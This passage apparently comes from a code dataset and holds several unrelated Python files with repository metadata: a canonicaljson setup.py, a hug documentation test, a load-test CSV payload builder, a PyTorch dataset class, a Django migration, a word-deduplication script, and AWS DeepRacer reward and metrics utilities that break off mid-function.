# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
def read_file(path_segments):
"""Read a UTF-8 file from the package. Takes a list of strings to join to
make the path"""
file_path = os.path.join(here, *path_segments)
with open(file_path, encoding="utf-8") as f:
return f.read()
def exec_file(path_segments, name):
"""Extract a constant from a python file by looking for a line defining
the constant and executing it."""
result = {}
code = read_file(path_segments)
lines = [line for line in code.split("\n") if line.startswith(name)]
exec("\n".join(lines), result)
return result[name]
setup(
name="canonicaljson",
version=exec_file(("canonicaljson.py",), "__version__"),
py_modules=["canonicaljson"],
description="Canonical JSON",
install_requires=[
# simplerjson versions before 3.14.0 had a bug with some characters
# (e.g. \u2028) if ensure_ascii was set to false.
"simplejson>=3.14.0",
"frozendict>=1.0",
],
zip_safe=True,
long_description=read_file(("README.rst",)),
keywords="json",
author="The Matrix.org Team",
author_email="team@matrix.org",
url="https://github.com/matrix-org/python-canonicaljson",
license="Apache License, Version 2.0",
python_requires="~=3.5",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
],
)
| 32.828571 | 77 | 0.681897 |
from setuptools import setup
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
def read_file(path_segments):
file_path = os.path.join(here, *path_segments)
with open(file_path, encoding="utf-8") as f:
return f.read()
def exec_file(path_segments, name):
result = {}
code = read_file(path_segments)
lines = [line for line in code.split("\n") if line.startswith(name)]
exec("\n".join(lines), result)
return result[name]
setup(
name="canonicaljson",
version=exec_file(("canonicaljson.py",), "__version__"),
py_modules=["canonicaljson"],
description="Canonical JSON",
install_requires=[
"simplejson>=3.14.0",
"frozendict>=1.0",
],
zip_safe=True,
long_description=read_file(("README.rst",)),
keywords="json",
author="The Matrix.org Team",
author_email="team@matrix.org",
url="https://github.com/matrix-org/python-canonicaljson",
license="Apache License, Version 2.0",
python_requires="~=3.5",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
],
)
| true | true |
1c2cca35a74332f377244398859324b2bdc9ec2d | 3,732 | py | Python | tests/test_documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | tests/test_documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | tests/test_documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | """tests/test_documentation.py.
Tests the documentation generation capibilities integrated into Hug
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
import json
import hug
from falcon import Request
from falcon.testing import StartResponseMock, create_environ
api = sys.modules[__name__]
def test_basic_documentation():
'''Ensure creating and then documenting APIs with Hug works as intuitively as expected'''
@hug.get()
def hello_world():
"""Returns hello world"""
return "Hello World!"
@hug.post()
def echo(text):
"""Returns back whatever data it is given in the text parameter"""
return text
@hug.post('/happy_birthday', examples="name=HUG&age=1")
def birthday(name, age:hug.types.number=1):
"""Says happy birthday to a user"""
return "Happy {age} Birthday {name}!".format(**locals())
@hug.post()
def noop(request, response):
"""Performs no action"""
pass
documentation = hug.documentation.generate(api)
assert 'test_documentation' in documentation['overview']
assert '/hello_world' in documentation
assert '/echo' in documentation
assert '/happy_birthday' in documentation
assert not '/birthday' in documentation
assert '/noop' in documentation
assert documentation['/hello_world']['GET']['usage'] == "Returns hello world"
assert documentation['/hello_world']['GET']['examples'] == ["/hello_world"]
assert documentation['/hello_world']['GET']['outputs']['content_type'] == "application/json"
assert not 'inputs' in documentation['/hello_world']['GET']
assert 'text' in documentation['/echo']['POST']['inputs']['text']['type']
assert not 'default' in documentation['/echo']['POST']['inputs']['text']
assert 'number' in documentation['/happy_birthday']['POST']['inputs']['age']['type']
assert documentation['/happy_birthday']['POST']['inputs']['age']['default'] == 1
assert not 'inputs' in documentation['/noop']['POST']
@hug.post(versions=1)
def echo(text):
"""V1 Docs"""
return 'V1'
versioned_doc = hug.documentation.generate(api)
assert 'versions' in versioned_doc
assert 1 in versioned_doc['versions']
specific_version_doc = hug.documentation.generate(api, api_version=1)
assert not 'versions' in specific_version_doc
assert '/echo' in specific_version_doc
handler = hug.run.documentation_404(api)
response = StartResponseMock()
handler(Request(create_environ(path='v1/doc')), response)
documentation = json.loads(response.data.decode('utf8'))['documentation']
assert not 'versions' in documentation
assert '/echo' in documentation
| 38.474227 | 112 | 0.715702 | import sys
import json
import hug
from falcon import Request
from falcon.testing import StartResponseMock, create_environ
api = sys.modules[__name__]
def test_basic_documentation():
@hug.get()
def hello_world():
return "Hello World!"
@hug.post()
def echo(text):
return text
@hug.post('/happy_birthday', examples="name=HUG&age=1")
def birthday(name, age:hug.types.number=1):
return "Happy {age} Birthday {name}!".format(**locals())
@hug.post()
def noop(request, response):
pass
documentation = hug.documentation.generate(api)
assert 'test_documentation' in documentation['overview']
assert '/hello_world' in documentation
assert '/echo' in documentation
assert '/happy_birthday' in documentation
assert not '/birthday' in documentation
assert '/noop' in documentation
assert documentation['/hello_world']['GET']['usage'] == "Returns hello world"
assert documentation['/hello_world']['GET']['examples'] == ["/hello_world"]
assert documentation['/hello_world']['GET']['outputs']['content_type'] == "application/json"
assert not 'inputs' in documentation['/hello_world']['GET']
assert 'text' in documentation['/echo']['POST']['inputs']['text']['type']
assert not 'default' in documentation['/echo']['POST']['inputs']['text']
assert 'number' in documentation['/happy_birthday']['POST']['inputs']['age']['type']
assert documentation['/happy_birthday']['POST']['inputs']['age']['default'] == 1
assert not 'inputs' in documentation['/noop']['POST']
@hug.post(versions=1)
def echo(text):
return 'V1'
versioned_doc = hug.documentation.generate(api)
assert 'versions' in versioned_doc
assert 1 in versioned_doc['versions']
specific_version_doc = hug.documentation.generate(api, api_version=1)
assert not 'versions' in specific_version_doc
assert '/echo' in specific_version_doc
handler = hug.run.documentation_404(api)
response = StartResponseMock()
handler(Request(create_environ(path='v1/doc')), response)
documentation = json.loads(response.data.decode('utf8'))['documentation']
assert not 'versions' in documentation
assert '/echo' in documentation
| true | true |
1c2cca974cf1dcfdfefeff96f2e21d26308fae81 | 421 | py | Python | mme/construct_payload.py | arunprsh/SageMaker-Load-Testing | 94c09520f9e8d63a936749af474efbc5de18c719 | [
"Apache-2.0"
] | 12 | 2021-01-20T04:35:06.000Z | 2022-03-02T14:48:45.000Z | mme/construct_payload.py | C24IO/SageMaker-Load-Testing | f1efbe63f7e7bdfa8c0ea2c13ff544f94231fe8e | [
"Apache-2.0"
] | null | null | null | mme/construct_payload.py | C24IO/SageMaker-Load-Testing | f1efbe63f7e7bdfa8c0ea2c13ff544f94231fe8e | [
"Apache-2.0"
] | 3 | 2021-04-14T18:29:33.000Z | 2021-12-08T18:58:12.000Z | headers = 'id,text,filename__v,format__v,size__v,charsize,pages__v'
id_ = '31011'
text = """Investigational Product Accountability Log
"""
filename__v = 'foo.docx'
format__v = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
size__v = '16290'
charsize = '768'
pages__v = '1'
row = ','.join([id_, repr(text), filename__v, format__v, size__v, charsize, pages__v])
PAYLOAD = headers + '\n' + row | 28.066667 | 86 | 0.738717 | headers = 'id,text,filename__v,format__v,size__v,charsize,pages__v'
id_ = '31011'
text = """Investigational Product Accountability Log
"""
filename__v = 'foo.docx'
format__v = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
size__v = '16290'
charsize = '768'
pages__v = '1'
row = ','.join([id_, repr(text), filename__v, format__v, size__v, charsize, pages__v])
PAYLOAD = headers + '\n' + row | true | true |
1c2ccb41874d89447182b59e9eb3225355995335 | 756 | py | Python | webinspect/__init__.py | hqlian007/AndroidUISpy | 58bef1c590182baea0de91b2eecc68c3255a6f72 | [
"BSD-3-Clause"
] | null | null | null | webinspect/__init__.py | hqlian007/AndroidUISpy | 58bef1c590182baea0de91b2eecc68c3255a6f72 | [
"BSD-3-Clause"
] | null | null | null | webinspect/__init__.py | hqlian007/AndroidUISpy | 58bef1c590182baea0de91b2eecc68c3255a6f72 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''用于探测WEB元素
''' | 44.470588 | 89 | 0.739418 | true | true | |
1c2ccd2404baa48459d5538ea58cdda8b1dfb0bc | 1,318 | py | Python | src/xrl/algorithms/minidr/dataset.py | k4ntz/XmodRL | dffb416bcd91010d8075ee1ac00cc4b9a3021967 | [
"MIT"
] | null | null | null | src/xrl/algorithms/minidr/dataset.py | k4ntz/XmodRL | dffb416bcd91010d8075ee1ac00cc4b9a3021967 | [
"MIT"
] | null | null | null | src/xrl/algorithms/minidr/dataset.py | k4ntz/XmodRL | dffb416bcd91010d8075ee1ac00cc4b9a3021967 | [
"MIT"
] | 1 | 2021-11-10T18:09:27.000Z | 2021-11-10T18:09:27.000Z | import numpy as np
import torch
from torch._C import dtype
import torch.nn as nn
from torch.utils.data import Dataset
class ModelDataset(Dataset):
def __init__(self, history, history_size):
self.h = history #history is passed as list and updated outside
self.history_size = history_size
def __len__(self):
return self.history_size
def __getitem__(self, idx):
idx = idx % len(self.h) #do not exceed history length
episode = self.h[idx]
idx_sample = np.random.randint(0, (len(episode)-1)//4) #sample random part of episode
# one entry is last state, action, state and reward as seperate entries
last_states = episode[idx_sample * 4]
actions= episode[idx_sample * 4 + 1]
states = episode[idx_sample * 4 + 2]
rewards= episode[idx_sample * 4 + 3]
# flatten raw features list
last_states = [[0,0] if x==None else x for x in last_states]
last_states = np.array(np.array(last_states).tolist()).flatten()
# convert to tensor
last_states = torch.tensor(last_states).float()
actions = torch.tensor(actions)
states = torch.tensor(np.array(states.tolist()).flatten()).float()
rewards = torch.tensor(rewards)
return last_states, actions, states, rewards | 36.611111 | 93 | 0.658574 | import numpy as np
import torch
from torch._C import dtype
import torch.nn as nn
from torch.utils.data import Dataset
class ModelDataset(Dataset):
def __init__(self, history, history_size):
self.h = history
self.history_size = history_size
def __len__(self):
return self.history_size
def __getitem__(self, idx):
idx = idx % len(self.h)
episode = self.h[idx]
idx_sample = np.random.randint(0, (len(episode)-1)//4)
last_states = episode[idx_sample * 4]
actions= episode[idx_sample * 4 + 1]
states = episode[idx_sample * 4 + 2]
rewards= episode[idx_sample * 4 + 3]
last_states = [[0,0] if x==None else x for x in last_states]
last_states = np.array(np.array(last_states).tolist()).flatten()
last_states = torch.tensor(last_states).float()
actions = torch.tensor(actions)
states = torch.tensor(np.array(states.tolist()).flatten()).float()
rewards = torch.tensor(rewards)
return last_states, actions, states, rewards | true | true |
1c2cceb046fb9903d31b37fb08da5b9ddd5d1010 | 1,706 | py | Python | profiles_api/migrations/0001_initial.py | Anuj2608/profiles-rest-api | 6a717c578918f6d7d39907b331d3517ace5a5fe5 | [
"MIT"
] | null | null | null | profiles_api/migrations/0001_initial.py | Anuj2608/profiles-rest-api | 6a717c578918f6d7d39907b331d3517ace5a5fe5 | [
"MIT"
] | 5 | 2020-06-06T01:54:14.000Z | 2021-06-10T20:11:58.000Z | profiles_api/migrations/0001_initial.py | MyNewLearnings2021/profiles-rest-api | 6a717c578918f6d7d39907b331d3517ace5a5fe5 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2020-05-14 16:53
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.176471 | 266 | 0.638921 |
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| true | true |
1c2ccf214446d9691fe6e4f4dab136343f93bacc | 1,377 | py | Python | src/Fourteenth Chapter/Example4.py | matthijskrul/ThinkPython | 34c1d81f4ef535c32b8b0309b23c7ca37f851606 | [
"MIT"
] | null | null | null | src/Fourteenth Chapter/Example4.py | matthijskrul/ThinkPython | 34c1d81f4ef535c32b8b0309b23c7ca37f851606 | [
"MIT"
] | null | null | null | src/Fourteenth Chapter/Example4.py | matthijskrul/ThinkPython | 34c1d81f4ef535c32b8b0309b23c7ca37f851606 | [
"MIT"
] | null | null | null | def text_to_words(the_text):
""" return a list of words with all punctuation removed,
and all in lowercase.
"""
my_substitutions = the_text.maketrans(
# If you find any of these
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&()*+,-./:;<=>?@[]^_`{|}~'\\",
# Replace them by these
"abcdefghijklmnopqrstuvwxyz ")
# Translate the text now.
cleaned_text = the_text.translate(my_substitutions)
wds = cleaned_text.split()
return wds
def get_words_in_book(filename):
""" Read a book from filename, and return a list of its words. """
f = open(filename, "r")
content = f.read()
f.close()
wds = text_to_words(content)
return wds
def remove_adjacent_dups(xs):
""" Return a new list in which all adjacent
duplicates from xs have been removed.
"""
result = []
most_recent_elem = None
for e in xs:
if e != most_recent_elem:
result.append(e)
most_recent_elem = e
return result
all_words = get_words_in_book("alice_in_wonderland.txt")
all_words.sort()
book_words = remove_adjacent_dups(all_words)
print("There are {0} words in the book. Only {1} are unique.".
format(len(all_words), len(book_words)))
print("The first 100 words are\n{0}".
format(book_words[:100]))
| 28.6875 | 79 | 0.615832 | def text_to_words(the_text):
my_substitutions = the_text.maketrans(
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"
# Replace them by these
"abcdefghijklmnopqrstuvwxyz ")
# Translate the text now.
cleaned_text = the_text.translate(my_substitutions)
wds = cleaned_text.split()
return wds
def get_words_in_book(filename):
f = open(filename, "r")
content = f.read()
f.close()
wds = text_to_words(content)
return wds
def remove_adjacent_dups(xs):
result = []
most_recent_elem = None
for e in xs:
if e != most_recent_elem:
result.append(e)
most_recent_elem = e
return result
all_words = get_words_in_book("alice_in_wonderland.txt")
all_words.sort()
book_words = remove_adjacent_dups(all_words)
print("There are {0} words in the book. Only {1} are unique.".
format(len(all_words), len(book_words)))
print("The first 100 words are\n{0}".
format(book_words[:100]))
| true | true |
1c2ccf7cdf5d9fe0d588b25248a61de676a451cb | 9,952 | py | Python | reinforcement_learning/rl_deepracer_robomaker_coach_gazebo/src/markov/agent_ctrl/utils.py | jpmarques19/tensorflwo-test | 0ff8b06e0415075c7269820d080284a42595bb2e | [
"Apache-2.0"
] | 5 | 2019-01-19T23:53:35.000Z | 2022-01-29T14:04:31.000Z | reinforcement_learning/rl_deepracer_robomaker_coach_gazebo/src/markov/agent_ctrl/utils.py | jpmarques19/tensorflwo-test | 0ff8b06e0415075c7269820d080284a42595bb2e | [
"Apache-2.0"
] | 4 | 2020-09-26T01:30:01.000Z | 2022-02-10T02:20:35.000Z | reinforcement_learning/rl_deepracer_robomaker_coach_gazebo/src/markov/agent_ctrl/utils.py | jpmarques19/tensorflwo-test | 0ff8b06e0415075c7269820d080284a42595bb2e | [
"Apache-2.0"
] | 7 | 2020-03-04T22:23:51.000Z | 2021-07-13T14:05:46.000Z | '''This module should house utility methods for the agent control classes'''
import json
import math
import logging
import markov.agent_ctrl.constants as const
from markov.metrics.constants import StepMetrics
from markov.agent_ctrl.constants import RewardParam
from markov.track_geom.constants import AgentPos, TrackNearDist, TrackNearPnts
from markov.log_handler.logger import Logger
from markov.log_handler.deepracer_exceptions import GenericRolloutException
from rl_coach.spaces import DiscreteActionSpace
from scipy.spatial.transform import Rotation
from markov.constants import SIMAPP_VERSION_1, SIMAPP_VERSION_2, SIMAPP_VERSION_3
LOGGER = Logger(__name__, logging.INFO).get_logger()
def set_reward_and_metrics(reward_params, step_metrics, agent_name, pos_dict, track_data,
                           data_dict, action, json_actions, car_pose):
    '''Populates the reward_params and step_metrics dictionaries with the common
       metrics and parameters shared by all agent controllers.

       Both dictionaries are mutated in place; nothing is returned.

       reward_params - Dictionary containing the input parameters to the reward function
       step_metrics - Dictionary containing the metrics that are sent to s3
       agent_name - String of agent name
       pos_dict - Dictionary containing the agent position data, keys defined in AgentPos
       track_data - Object containing all the track information and geometry
       data_dict - Dictionary containing previous progress, steps, and start distance
                   (keys 'prev_progress', 'steps', 'start_ndist')
       action - Integer index into json_actions for the action taken
       json_actions - Dictionary that maps action into steering and angle
       car_pose - Gazebo Pose of the agent

       Raises:
           GenericRolloutException - if a required key is missing from one of the
                                     input dictionaries or any computation fails.
    '''
    try:
        # Check that the required keys are present in the dicts that are being
        # passed in, these methods will throw an exception if a key is missing
        RewardParam.validate_dict(reward_params)
        # Agent position projected onto the track as a normalized distance
        # (fraction of total track length) plus its bracketing waypoints.
        # model point and distance
        model_point = pos_dict[AgentPos.POINT.value]
        current_ndist = track_data.get_norm_dist(model_point)
        prev_index, next_index = track_data.find_prev_next_waypoints(current_ndist,
                                                                     normalized=True)
        # model progress starting at the initial waypoint
        reverse_dir = track_data.reverse_dir
        # NOTE(review): this LEFT_CENT flip appears to be dead code — the key is
        # unconditionally recomputed below from nearest-distance data. Confirm intent.
        if reverse_dir:
            reward_params[const.RewardParam.LEFT_CENT.value[0]] = \
                not reward_params[const.RewardParam.LEFT_CENT.value[0]]
        # Progress is measured relative to the episode's start position and
        # sanity-checked against the previous step (handles finish-line wraparound).
        current_progress = current_ndist - data_dict['start_ndist']
        current_progress = compute_current_prog(current_progress,
                                                data_dict['prev_progress'])
        # Get the nearest points on the inner/outer track boundaries and center line
        nearest_pnts_dict = track_data.get_nearest_points(model_point)
        # Compute distance from center and road width
        nearest_dist_dict = track_data.get_nearest_dist(nearest_pnts_dict, model_point)
        # Compute the distance from the previous and next points
        distance_from_prev, distance_from_next = \
            track_data.get_distance_from_next_and_prev(model_point, prev_index,
                                                       next_index)
        # Compute which points (wheels/links) are on the track
        wheel_on_track = track_data.points_on_track(pos_dict[AgentPos.LINK_POINTS.value])
        # Get the model orientation (quaternion)
        model_orientation = pos_dict[AgentPos.ORIENTATION.value]
        # Set the reward and metric parameters; several values are written to
        # both dictionaries via chained assignment so they stay in sync.
        step_metrics[StepMetrics.STEPS.value] = \
            reward_params[RewardParam.STEPS.value[0]] = data_dict['steps']
        reward_params[RewardParam.REVERSE.value[0]] = reverse_dir
        step_metrics[StepMetrics.PROG.value] = \
            reward_params[RewardParam.PROG.value[0]] = current_progress
        reward_params[RewardParam.CENTER_DIST.value[0]] = \
            nearest_dist_dict[TrackNearDist.NEAR_DIST_CENT.value]
        # Absolute distance (in meters) of the projection point along the track.
        reward_params[RewardParam.PROJECTION_DISTANCE.value[0]] = \
            current_ndist * track_data.get_track_length()
        reward_params[RewardParam.CLS_WAYPNY.value[0]] = [prev_index, next_index]
        # "Left of center" is derived from which boundary is closer, corrected
        # for the track's winding direction (counter-clockwise or not).
        reward_params[RewardParam.LEFT_CENT.value[0]] = \
            (nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
             nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]) ^ (not track_data.is_ccw)
        reward_params[RewardParam.WAYPNTS.value[0]] = track_data.get_way_pnts()
        # Track width at the agent's position: inner-to-outer boundary distance.
        reward_params[RewardParam.TRACK_WIDTH.value[0]] = \
            nearest_pnts_dict[TrackNearPnts.NEAR_PNT_IN.value] \
            .distance(nearest_pnts_dict[TrackNearPnts.NEAR_PNT_OUT.value])
        reward_params[RewardParam.TRACK_LEN.value[0]] = track_data.get_track_length()
        step_metrics[StepMetrics.X.value] = \
            reward_params[RewardParam.X.value[0]] = model_point.x
        step_metrics[StepMetrics.Y.value] = \
            reward_params[RewardParam.Y.value[0]] = model_point.y
        # Heading: yaw extracted from the quaternion, converted to degrees.
        step_metrics[StepMetrics.YAW.value] = \
            reward_params[RewardParam.HEADING.value[0]] = \
            Rotation.from_quat(model_orientation).as_euler('zyx')[0] * 180.0 / math.pi
        step_metrics[StepMetrics.CLS_WAYPNT.value] = \
            next_index if distance_from_next < distance_from_prev else prev_index
        step_metrics[StepMetrics.TRACK_LEN.value] = track_data.get_track_length()
        # Decode the discrete action index into its steering/speed components.
        step_metrics[StepMetrics.STEER.value] = \
            reward_params[RewardParam.STEER.value[0]] = \
            float(json_actions[action]['steering_angle'])
        step_metrics[StepMetrics.THROTTLE.value] = \
            reward_params[RewardParam.SPEED.value[0]] = \
            float(json_actions[action]['speed'])
        step_metrics[StepMetrics.WHEELS_TRACK.value] = \
            reward_params[RewardParam.WHEELS_ON_TRACK.value[0]] = all(wheel_on_track)
        step_metrics[StepMetrics.ACTION.value] = action
        # set extra reward param for obstacle
        # NOTE(review): model_heading is assigned but never used below — confirm
        # whether get_object_reward_params was meant to receive it.
        model_heading = reward_params[RewardParam.HEADING.value[0]]
        obstacle_reward_params = track_data.get_object_reward_params(agent_name,
                                                                     model_point,
                                                                     car_pose)
        if obstacle_reward_params:
            reward_params.update(obstacle_reward_params)
    except KeyError as ex:
        raise GenericRolloutException("Key {}, not found".format(ex))
    except Exception as ex:
        raise GenericRolloutException('Cannot compute reward and metrics: {}'.format(ex))
def compute_current_prog(current_progress, prev_progress):
    '''Return the corrected current progress, expressed as a percentage.

    The raw progress delta is scaled to a percentage and then adjusted for
    driving in the reversed direction and for crossing the finish line in
    either direction, so consecutive progress values stay sensible.
    current_progress - The current progress after taking a step (fraction of a lap)
    prev_progress - The progress percentage from the previous step
    '''
    progress = current_progress * 100
    # Agent moving in the reversed direction wraps below zero; bring it back
    # into the positive range.
    if progress <= 0:
        progress += 100
    # Crossed the finish line while driving in the normal direction.
    if prev_progress > progress + 50.0:
        progress += 100.0
    # Crossed the finish line while driving in the reversed direction.
    if progress > prev_progress + 50.0:
        progress -= 100.0
    # Progress can never exceed a full lap.
    return min(progress, 100)
def get_normalized_progress(current_progress, start_ndist):
    """
    Return the current progress normalized with respect to the START LINE of the track.
    Args:
        current_progress: progress value to normalize (0 - 100)
        start_ndist: normalized start offset along the track (0.0 - 1.0)
    Returns:
        current progress relative to the START LINE, wrapped into [0, 100).
    """
    start_offset = start_ndist * 100
    return (current_progress + start_offset) % 100
def send_action(velocity_pub_dict, steering_pub_dict, steering_angle, speed):
    '''Publish the given action to every topic in the given dicts.
    velocity_pub_dict - Dictionary containing all the velocity joints
    steering_pub_dict - Dictionary containing all the movable joints
    steering_angle - Desired amount, in radians, to move the movable joints by
    speed - Angular velocity which the velocity joints should rotate with
    '''
    # The topic names (keys) are irrelevant here; only the publishers matter.
    for velocity_publisher in velocity_pub_dict.values():
        velocity_publisher.publish(speed)
    for steering_publisher in steering_pub_dict.values():
        steering_publisher.publish(steering_angle)
def load_action_space(path_to_json):
    '''Load the action space from a given json file, falling back to the
    default action space when the file cannot be read or parsed.
    path_to_json - Absolute path to the json file containing the action space
    '''
    try:
        # Try loading the custom model metadata (may or may not be present).
        with open(path_to_json, 'r') as metadata_file:
            json_actions = json.load(metadata_file)['action_space']
        LOGGER.info("Loaded action space from file: %s", json_actions)
    except Exception as ex:
        # Failed to load; fall back on the default action space.
        from markov.defaults import model_metadata
        json_actions = model_metadata['action_space']
        LOGGER.info("Exception %s on loading custom action space, using default: %s", \
                    ex, json_actions)
    # Default action is the first action with zero steering, if any exists.
    default_index = next((index for index, act in enumerate(json_actions)
                          if act['steering_angle'] == 0), None)
    action_space = DiscreteActionSpace(num_actions=len(json_actions),
                                       default_action=default_index)
    return action_space, json_actions
def get_speed_factor(version):
    ''' Return the velocity factor for a given physics version.
    version (float): Sim app version for which to retrieve the velocity factor
    '''
    # Known sim app versions paired with their velocity factors.
    known_factors = ((SIMAPP_VERSION_3, 2.77),
                     (SIMAPP_VERSION_2, 3.5),
                     (SIMAPP_VERSION_1, 1.0))
    for known_version, factor in known_factors:
        if version == known_version:
            return factor
    raise Exception("No velocity factor for given version")
| 51.035897 | 99 | 0.686194 | import json
import math
import logging
import markov.agent_ctrl.constants as const
from markov.metrics.constants import StepMetrics
from markov.agent_ctrl.constants import RewardParam
from markov.track_geom.constants import AgentPos, TrackNearDist, TrackNearPnts
from markov.log_handler.logger import Logger
from markov.log_handler.deepracer_exceptions import GenericRolloutException
from rl_coach.spaces import DiscreteActionSpace
from scipy.spatial.transform import Rotation
from markov.constants import SIMAPP_VERSION_1, SIMAPP_VERSION_2, SIMAPP_VERSION_3
LOGGER = Logger(__name__, logging.INFO).get_logger()
def set_reward_and_metrics(reward_params, step_metrics, agent_name, pos_dict, track_data,
data_dict, action, json_actions, car_pose):
try:
RewardParam.validate_dict(reward_params)
model_point = pos_dict[AgentPos.POINT.value]
current_ndist = track_data.get_norm_dist(model_point)
prev_index, next_index = track_data.find_prev_next_waypoints(current_ndist,
normalized=True)
reverse_dir = track_data.reverse_dir
if reverse_dir:
reward_params[const.RewardParam.LEFT_CENT.value[0]] = \
not reward_params[const.RewardParam.LEFT_CENT.value[0]]
current_progress = current_ndist - data_dict['start_ndist']
current_progress = compute_current_prog(current_progress,
data_dict['prev_progress'])
nearest_pnts_dict = track_data.get_nearest_points(model_point)
nearest_dist_dict = track_data.get_nearest_dist(nearest_pnts_dict, model_point)
distance_from_prev, distance_from_next = \
track_data.get_distance_from_next_and_prev(model_point, prev_index,
next_index)
wheel_on_track = track_data.points_on_track(pos_dict[AgentPos.LINK_POINTS.value])
model_orientation = pos_dict[AgentPos.ORIENTATION.value]
step_metrics[StepMetrics.STEPS.value] = \
reward_params[RewardParam.STEPS.value[0]] = data_dict['steps']
reward_params[RewardParam.REVERSE.value[0]] = reverse_dir
step_metrics[StepMetrics.PROG.value] = \
reward_params[RewardParam.PROG.value[0]] = current_progress
reward_params[RewardParam.CENTER_DIST.value[0]] = \
nearest_dist_dict[TrackNearDist.NEAR_DIST_CENT.value]
reward_params[RewardParam.PROJECTION_DISTANCE.value[0]] = \
current_ndist * track_data.get_track_length()
reward_params[RewardParam.CLS_WAYPNY.value[0]] = [prev_index, next_index]
reward_params[RewardParam.LEFT_CENT.value[0]] = \
(nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]) ^ (not track_data.is_ccw)
reward_params[RewardParam.WAYPNTS.value[0]] = track_data.get_way_pnts()
reward_params[RewardParam.TRACK_WIDTH.value[0]] = \
nearest_pnts_dict[TrackNearPnts.NEAR_PNT_IN.value] \
.distance(nearest_pnts_dict[TrackNearPnts.NEAR_PNT_OUT.value])
reward_params[RewardParam.TRACK_LEN.value[0]] = track_data.get_track_length()
step_metrics[StepMetrics.X.value] = \
reward_params[RewardParam.X.value[0]] = model_point.x
